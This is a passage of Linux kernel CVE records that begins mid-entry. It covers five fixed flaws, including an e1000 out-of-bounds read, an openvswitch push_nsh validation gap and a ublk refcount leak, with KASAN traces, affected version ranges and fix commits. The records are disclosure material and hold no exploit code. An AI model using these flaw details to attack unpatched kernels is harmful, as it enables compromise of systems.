0000000000004024 RCX: 00007f511b476b10\nRDX: 0000000000004024 RSI: 0000559a9385962c RDI: 0000000000000003\nRBP: 0000559a9383a400 R08: fffffffffffffff0 R09: 0000000000004f00\nR10: 0000000000000070 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007ffc9211d57f R14: 0000559a9347bde7 R15: 0000000000000003\n \u003c/TASK\u003e\nAllocated by task 1:\n __kasan_krealloc+0x131/0x1c0\n krealloc+0x90/0xc0\n add_sysfs_param+0xcb/0x8a0\n kernel_add_sysfs_param+0x81/0xd4\n param_sysfs_builtin+0x138/0x1a6\n param_sysfs_init+0x57/0x5b\n do_one_initcall+0x104/0x250\n do_initcall_level+0x102/0x132\n do_initcalls+0x46/0x74\n kernel_init_freeable+0x28f/0x393\n kernel_init+0x14/0x1a0\n ret_from_fork+0x22/0x30\nThe buggy address belongs to the object at ffff888014114000\n which belongs to the cache kmalloc-2k of size 2048\nThe buggy address is located 1620 bytes to the right of\n 2048-byte region [ffff888014114000, ffff888014114800]\nThe buggy address belongs to the physical page:\npage:ffffea0000504400 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x14110\nhead:ffffea0000504400 order:3 compound_mapcount:0 compound_pincount:0\nflags: 0x100000000010200(slab|head|node=0|zone=1)\nraw: 0100000000010200 0000000000000000 dead000000000001 ffff888013442000\nraw: 0000000000000000 0000000000080008 00000001ffffffff 0000000000000000\npage dumped because: kasan: bad access detected\n==================================================================\n\nThis happens because the TBI check unconditionally dereferences the last\nbyte without validating the reported length first:\n\n\tu8 last_byte = *(data + length - 1);\n\nFix by rejecting the frame early if the length is zero, or if it exceeds\nadapter-\u003erx_buffer_len. This preserves the TBI workaround semantics for\nvalid frames and prevents touching memory beyond the RX buffer."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:54.095Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4ccfa56f272241e8d8e2c38191fdbb03df489d80"
},
{
"url": "https://git.kernel.org/stable/c/278b7cfe0d4da7502c7fd679b15032f014c92892"
},
{
"url": "https://git.kernel.org/stable/c/ad7a2a45e2417ac54089926b520924f8f0d91aea"
},
{
"url": "https://git.kernel.org/stable/c/2c4c0c09f9648ba766d399917d420d03e7b3e1f8"
},
{
"url": "https://git.kernel.org/stable/c/26c8bebc2f25288c2bcac7bc0a7662279a0e817c"
},
{
"url": "https://git.kernel.org/stable/c/ee7c125fb3e8b04dd46510130b9fc92380e5d578"
},
{
"url": "https://git.kernel.org/stable/c/9c72a5182ed92904d01057f208c390a303f00a0f"
}
],
"title": "e1000: fix OOB in e1000_tbi_should_accept()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71093",
"datePublished": "2026-01-13T15:34:53.803Z",
"dateReserved": "2026-01-13T15:30:19.650Z",
"dateUpdated": "2026-01-19T12:19:54.095Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68812 (GCVE-0-2025-68812)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
Title
media: iris: Add sanity check for stop streaming
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: iris: Add sanity check for stop streaming
Add sanity check in iris_vb2_stop_streaming. If inst->state is
already IRIS_INST_ERROR, we should skip the stream_off operation
because it would still send packets to the firmware.
In iris_kill_session, inst->state is set to IRIS_INST_ERROR and
session_close is executed, which will kfree(inst_hfi_gen2->packet).
If stop_streaming is called afterward, it will cause a crash.
[bod: remove qcom from patch title]
Severity
No CVSS data available.
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/platform/qcom/iris/iris_vb2.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f8b136296722e258ec43237a35f72c92a6d4501a",
"status": "affected",
"version": "11712ce70f8e52fc94365b48ee15aec806b02422",
"versionType": "git"
},
{
"lessThan": "ad699fa78b59241c9d71a8cafb51525f3dab04d4",
"status": "affected",
"version": "11712ce70f8e52fc94365b48ee15aec806b02422",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/platform/qcom/iris/iris_vb2.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.15"
},
{
"lessThan": "6.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: iris: Add sanity check for stop streaming\n\nAdd sanity check in iris_vb2_stop_streaming. If inst-\u003estate is\nalready IRIS_INST_ERROR, we should skip the stream_off operation\nbecause it would still send packets to the firmware.\n\nIn iris_kill_session, inst-\u003estate is set to IRIS_INST_ERROR and\nsession_close is executed, which will kfree(inst_hfi_gen2-\u003epacket).\nIf stop_streaming is called afterward, it will cause a crash.\n\n[bod: remove qcom from patch title]"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:17.811Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f8b136296722e258ec43237a35f72c92a6d4501a"
},
{
"url": "https://git.kernel.org/stable/c/ad699fa78b59241c9d71a8cafb51525f3dab04d4"
}
],
"title": "media: iris: Add sanity check for stop streaming",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68812",
"datePublished": "2026-01-13T15:29:17.811Z",
"dateReserved": "2025-12-24T10:30:51.047Z",
"dateUpdated": "2026-01-13T15:29:17.811Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71081 (GCVE-0-2025-71081)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
Title
ASoC: stm32: sai: fix OF node leak on probe
Summary
In the Linux kernel, the following vulnerability has been resolved:
ASoC: stm32: sai: fix OF node leak on probe
The reference taken to the sync provider OF node when probing the
platform device is currently only dropped if the set_sync() callback
fails during DAI probe.
Make sure to drop the reference on platform probe failures (e.g. probe
deferral) and on driver unbind.
This also avoids a potential use-after-free in case the DAI is ever
reprobed without first rebinding the platform driver.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
5914d285f6b782892a91d6621723fdc41a775b15 , < 7daa50a2157e41c964b745ab1dc378b5b3b626d1
(git)
Affected: 5914d285f6b782892a91d6621723fdc41a775b15 , < acda653169e180b1d860dbb6bc5aceb105858394 (git) Affected: 5914d285f6b782892a91d6621723fdc41a775b15 , < 4054a3597d047f3fe87864ef87f399b5d523e6c0 (git) Affected: 5914d285f6b782892a91d6621723fdc41a775b15 , < bae74771fc5d3b2a9cf6f5aa64596083d032c4a3 (git) Affected: 5914d285f6b782892a91d6621723fdc41a775b15 , < 3752afcc6d80d5525e236e329895ba2cb93bcb26 (git) Affected: 5914d285f6b782892a91d6621723fdc41a775b15 , < 23261f0de09427367e99f39f588e31e2856a690e (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"sound/soc/stm/stm32_sai.c",
"sound/soc/stm/stm32_sai_sub.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7daa50a2157e41c964b745ab1dc378b5b3b626d1",
"status": "affected",
"version": "5914d285f6b782892a91d6621723fdc41a775b15",
"versionType": "git"
},
{
"lessThan": "acda653169e180b1d860dbb6bc5aceb105858394",
"status": "affected",
"version": "5914d285f6b782892a91d6621723fdc41a775b15",
"versionType": "git"
},
{
"lessThan": "4054a3597d047f3fe87864ef87f399b5d523e6c0",
"status": "affected",
"version": "5914d285f6b782892a91d6621723fdc41a775b15",
"versionType": "git"
},
{
"lessThan": "bae74771fc5d3b2a9cf6f5aa64596083d032c4a3",
"status": "affected",
"version": "5914d285f6b782892a91d6621723fdc41a775b15",
"versionType": "git"
},
{
"lessThan": "3752afcc6d80d5525e236e329895ba2cb93bcb26",
"status": "affected",
"version": "5914d285f6b782892a91d6621723fdc41a775b15",
"versionType": "git"
},
{
"lessThan": "23261f0de09427367e99f39f588e31e2856a690e",
"status": "affected",
"version": "5914d285f6b782892a91d6621723fdc41a775b15",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"sound/soc/stm/stm32_sai.c",
"sound/soc/stm/stm32_sai_sub.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.15"
},
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "4.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: stm32: sai: fix OF node leak on probe\n\nThe reference taken to the sync provider OF node when probing the\nplatform device is currently only dropped if the set_sync() callback\nfails during DAI probe.\n\nMake sure to drop the reference on platform probe failures (e.g. probe\ndeferral) and on driver unbind.\n\nThis also avoids a potential use-after-free in case the DAI is ever\nreprobed without first rebinding the platform driver."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:42.791Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7daa50a2157e41c964b745ab1dc378b5b3b626d1"
},
{
"url": "https://git.kernel.org/stable/c/acda653169e180b1d860dbb6bc5aceb105858394"
},
{
"url": "https://git.kernel.org/stable/c/4054a3597d047f3fe87864ef87f399b5d523e6c0"
},
{
"url": "https://git.kernel.org/stable/c/bae74771fc5d3b2a9cf6f5aa64596083d032c4a3"
},
{
"url": "https://git.kernel.org/stable/c/3752afcc6d80d5525e236e329895ba2cb93bcb26"
},
{
"url": "https://git.kernel.org/stable/c/23261f0de09427367e99f39f588e31e2856a690e"
}
],
"title": "ASoC: stm32: sai: fix OF node leak on probe",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71081",
"datePublished": "2026-01-13T15:34:45.503Z",
"dateReserved": "2026-01-13T15:30:19.648Z",
"dateUpdated": "2026-01-19T12:19:42.791Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68785 (GCVE-0-2025-68785)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:19
Title
net: openvswitch: fix middle attribute validation in push_nsh() action
Summary
In the Linux kernel, the following vulnerability has been resolved:

net: openvswitch: fix middle attribute validation in push_nsh() action

The push_nsh() action structure looks like this:

    OVS_ACTION_ATTR_PUSH_NSH(OVS_KEY_ATTR_NSH(OVS_NSH_KEY_ATTR_BASE,...))

The outermost OVS_ACTION_ATTR_PUSH_NSH attribute is OK'ed by the
nla_for_each_nested() inside __ovs_nla_copy_actions(). The innermost
OVS_NSH_KEY_ATTR_BASE/MD1/MD2 are OK'ed by the nla_for_each_nested()
inside nsh_key_put_from_nlattr(). But nothing checks if the attribute
in the middle is OK. We don't even check that this attribute is the
OVS_KEY_ATTR_NSH. We just do a double unwrap with a pair of nla_data()
calls - first time directly while calling validate_push_nsh() and the
second time as part of the nla_for_each_nested() macro, which isn't
safe, potentially causing invalid memory access if the size of this
attribute is incorrect. The failure may not be noticed during
validation due to larger netlink buffer, but cause trouble later during
action execution where the buffer is allocated exactly to the size:

    BUG: KASAN: slab-out-of-bounds in nsh_hdr_from_nlattr+0x1dd/0x6a0 [openvswitch]
    Read of size 184 at addr ffff88816459a634 by task a.out/22624

    CPU: 8 UID: 0 PID: 22624 6.18.0-rc7+ #115 PREEMPT(voluntary)
    Call Trace:
     <TASK>
     dump_stack_lvl+0x51/0x70
     print_address_description.constprop.0+0x2c/0x390
     kasan_report+0xdd/0x110
     kasan_check_range+0x35/0x1b0
     __asan_memcpy+0x20/0x60
     nsh_hdr_from_nlattr+0x1dd/0x6a0 [openvswitch]
     push_nsh+0x82/0x120 [openvswitch]
     do_execute_actions+0x1405/0x2840 [openvswitch]
     ovs_execute_actions+0xd5/0x3b0 [openvswitch]
     ovs_packet_cmd_execute+0x949/0xdb0 [openvswitch]
     genl_family_rcv_msg_doit+0x1d6/0x2b0
     genl_family_rcv_msg+0x336/0x580
     genl_rcv_msg+0x9f/0x130
     netlink_rcv_skb+0x11f/0x370
     genl_rcv+0x24/0x40
     netlink_unicast+0x73e/0xaa0
     netlink_sendmsg+0x744/0xbf0
     __sys_sendto+0x3d6/0x450
     do_syscall_64+0x79/0x2c0
     entry_SYSCALL_64_after_hwframe+0x76/0x7e
     </TASK>

Let's add some checks that the attribute is properly sized and it's
the only one attribute inside the action. Technically, there is no
real reason for OVS_KEY_ATTR_NSH to be there, as we know that we're
pushing an NSH header already, it just creates extra nesting, but
that's how uAPI works today. So, keeping as it is.
Severity
No CVSS data available.
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/openvswitch/flow_netlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d0c135b8bbbcf92836068fd395bebeb7ae6c7bef",
"status": "affected",
"version": "b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3",
"versionType": "git"
},
{
"lessThan": "3bc2efff20a38b2c7ca18317649715df0dd62ced",
"status": "affected",
"version": "b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3",
"versionType": "git"
},
{
"lessThan": "1b569db9c2f28b599e40050524aae5f7332bc294",
"status": "affected",
"version": "b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3",
"versionType": "git"
},
{
"lessThan": "10ffc558246f2c75619aedda0921906095e46702",
"status": "affected",
"version": "b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3",
"versionType": "git"
},
{
"lessThan": "2ecfc4433acdb149eafd7fb22d7fd4adf90b25e9",
"status": "affected",
"version": "b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3",
"versionType": "git"
},
{
"lessThan": "c999153bfb2d1d9b295b7010d920f2a7c6d7595f",
"status": "affected",
"version": "b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3",
"versionType": "git"
},
{
"lessThan": "5ace7ef87f059d68b5f50837ef3e8a1a4870c36e",
"status": "affected",
"version": "b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/openvswitch/flow_netlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.15"
},
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "4.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: openvswitch: fix middle attribute validation in push_nsh() action\n\nThe push_nsh() action structure looks like this:\n\n OVS_ACTION_ATTR_PUSH_NSH(OVS_KEY_ATTR_NSH(OVS_NSH_KEY_ATTR_BASE,...))\n\nThe outermost OVS_ACTION_ATTR_PUSH_NSH attribute is OK\u0027ed by the\nnla_for_each_nested() inside __ovs_nla_copy_actions(). The innermost\nOVS_NSH_KEY_ATTR_BASE/MD1/MD2 are OK\u0027ed by the nla_for_each_nested()\ninside nsh_key_put_from_nlattr(). But nothing checks if the attribute\nin the middle is OK. We don\u0027t even check that this attribute is the\nOVS_KEY_ATTR_NSH. We just do a double unwrap with a pair of nla_data()\ncalls - first time directly while calling validate_push_nsh() and the\nsecond time as part of the nla_for_each_nested() macro, which isn\u0027t\nsafe, potentially causing invalid memory access if the size of this\nattribute is incorrect. The failure may not be noticed during\nvalidation due to larger netlink buffer, but cause trouble later during\naction execution where the buffer is allocated exactly to the size:\n\n BUG: KASAN: slab-out-of-bounds in nsh_hdr_from_nlattr+0x1dd/0x6a0 [openvswitch]\n Read of size 184 at addr ffff88816459a634 by task a.out/22624\n\n CPU: 8 UID: 0 PID: 22624 6.18.0-rc7+ #115 PREEMPT(voluntary)\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x51/0x70\n print_address_description.constprop.0+0x2c/0x390\n kasan_report+0xdd/0x110\n kasan_check_range+0x35/0x1b0\n __asan_memcpy+0x20/0x60\n nsh_hdr_from_nlattr+0x1dd/0x6a0 [openvswitch]\n push_nsh+0x82/0x120 [openvswitch]\n do_execute_actions+0x1405/0x2840 [openvswitch]\n ovs_execute_actions+0xd5/0x3b0 [openvswitch]\n ovs_packet_cmd_execute+0x949/0xdb0 [openvswitch]\n genl_family_rcv_msg_doit+0x1d6/0x2b0\n genl_family_rcv_msg+0x336/0x580\n genl_rcv_msg+0x9f/0x130\n netlink_rcv_skb+0x11f/0x370\n genl_rcv+0x24/0x40\n netlink_unicast+0x73e/0xaa0\n netlink_sendmsg+0x744/0xbf0\n 
__sys_sendto+0x3d6/0x450\n do_syscall_64+0x79/0x2c0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\nLet\u0027s add some checks that the attribute is properly sized and it\u0027s\nthe only one attribute inside the action. Technically, there is no\nreal reason for OVS_KEY_ATTR_NSH to be there, as we know that we\u0027re\npushing an NSH header already, it just creates extra nesting, but\nthat\u0027s how uAPI works today. So, keeping as it is."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:02.370Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d0c135b8bbbcf92836068fd395bebeb7ae6c7bef"
},
{
"url": "https://git.kernel.org/stable/c/3bc2efff20a38b2c7ca18317649715df0dd62ced"
},
{
"url": "https://git.kernel.org/stable/c/1b569db9c2f28b599e40050524aae5f7332bc294"
},
{
"url": "https://git.kernel.org/stable/c/10ffc558246f2c75619aedda0921906095e46702"
},
{
"url": "https://git.kernel.org/stable/c/2ecfc4433acdb149eafd7fb22d7fd4adf90b25e9"
},
{
"url": "https://git.kernel.org/stable/c/c999153bfb2d1d9b295b7010d920f2a7c6d7595f"
},
{
"url": "https://git.kernel.org/stable/c/5ace7ef87f059d68b5f50837ef3e8a1a4870c36e"
}
],
"title": "net: openvswitch: fix middle attribute validation in push_nsh() action",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68785",
"datePublished": "2026-01-13T15:28:58.930Z",
"dateReserved": "2025-12-24T10:30:51.036Z",
"dateUpdated": "2026-01-19T12:19:02.370Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71070 (GCVE-0-2025-71070)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-13 15:31
Title
ublk: clean up user copy references on ublk server exit
Summary
In the Linux kernel, the following vulnerability has been resolved:

ublk: clean up user copy references on ublk server exit

If a ublk server process releases a ublk char device file, any requests
dispatched to the ublk server but not yet completed will retain a ref
value of UBLK_REFCOUNT_INIT. Before commit e63d2228ef83 ("ublk: simplify
aborting ublk request"), __ublk_fail_req() would decrement the reference
count before completing the failed request. However, that commit
optimized __ublk_fail_req() to call __ublk_complete_rq() directly
without decrementing the request reference count.
The leaked reference count incorrectly allows user copy and zero copy
operations on the completed ublk request. It also triggers the
WARN_ON_ONCE(refcount_read(&io->ref)) warnings in ublk_queue_reinit()
and ublk_deinit_queue().
Commit c5c5eb24ed61 ("ublk: avoid ublk_io_release() called after ublk
char dev is closed") already fixed the issue for ublk devices using
UBLK_F_SUPPORT_ZERO_COPY or UBLK_F_AUTO_BUF_REG. However, the reference
count leak also affects UBLK_F_USER_COPY, the other reference-counted
data copy mode. Fix the condition in ublk_check_and_reset_active_ref()
to include all reference-counted data copy modes. This ensures that any
ublk requests still owned by the ublk server when it exits have their
reference counts reset to 0.
Severity
No CVSS data available.
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/block/ublk_drv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "13456b4f1033d911f8bf3a0a1195656f293ba0f6",
"status": "affected",
"version": "e63d2228ef831af36f963b3ab8604160cfff84c1",
"versionType": "git"
},
{
"lessThan": "daa24603d9f0808929514ee62ced30052ca7221c",
"status": "affected",
"version": "e63d2228ef831af36f963b3ab8604160cfff84c1",
"versionType": "git"
},
{
"status": "affected",
"version": "e537193fc4a43b48ac51cc6366319e15e32dd540",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/block/ublk_drv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.15"
},
{
"lessThan": "6.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc3",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc3",
"versionStartIncluding": "6.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.14.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nublk: clean up user copy references on ublk server exit\n\nIf a ublk server process releases a ublk char device file, any requests\ndispatched to the ublk server but not yet completed will retain a ref\nvalue of UBLK_REFCOUNT_INIT. Before commit e63d2228ef83 (\"ublk: simplify\naborting ublk request\"), __ublk_fail_req() would decrement the reference\ncount before completing the failed request. However, that commit\noptimized __ublk_fail_req() to call __ublk_complete_rq() directly\nwithout decrementing the request reference count.\nThe leaked reference count incorrectly allows user copy and zero copy\noperations on the completed ublk request. It also triggers the\nWARN_ON_ONCE(refcount_read(\u0026io-\u003eref)) warnings in ublk_queue_reinit()\nand ublk_deinit_queue().\nCommit c5c5eb24ed61 (\"ublk: avoid ublk_io_release() called after ublk\nchar dev is closed\") already fixed the issue for ublk devices using\nUBLK_F_SUPPORT_ZERO_COPY or UBLK_F_AUTO_BUF_REG. However, the reference\ncount leak also affects UBLK_F_USER_COPY, the other reference-counted\ndata copy mode. Fix the condition in ublk_check_and_reset_active_ref()\nto include all reference-counted data copy modes. This ensures that any\nublk requests still owned by the ublk server when it exits have their\nreference counts reset to 0."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:31:24.709Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/13456b4f1033d911f8bf3a0a1195656f293ba0f6"
},
{
"url": "https://git.kernel.org/stable/c/daa24603d9f0808929514ee62ced30052ca7221c"
}
],
"title": "ublk: clean up user copy references on ublk server exit",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71070",
"datePublished": "2026-01-13T15:31:24.709Z",
"dateReserved": "2026-01-13T15:30:19.647Z",
"dateUpdated": "2026-01-13T15:31:24.709Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
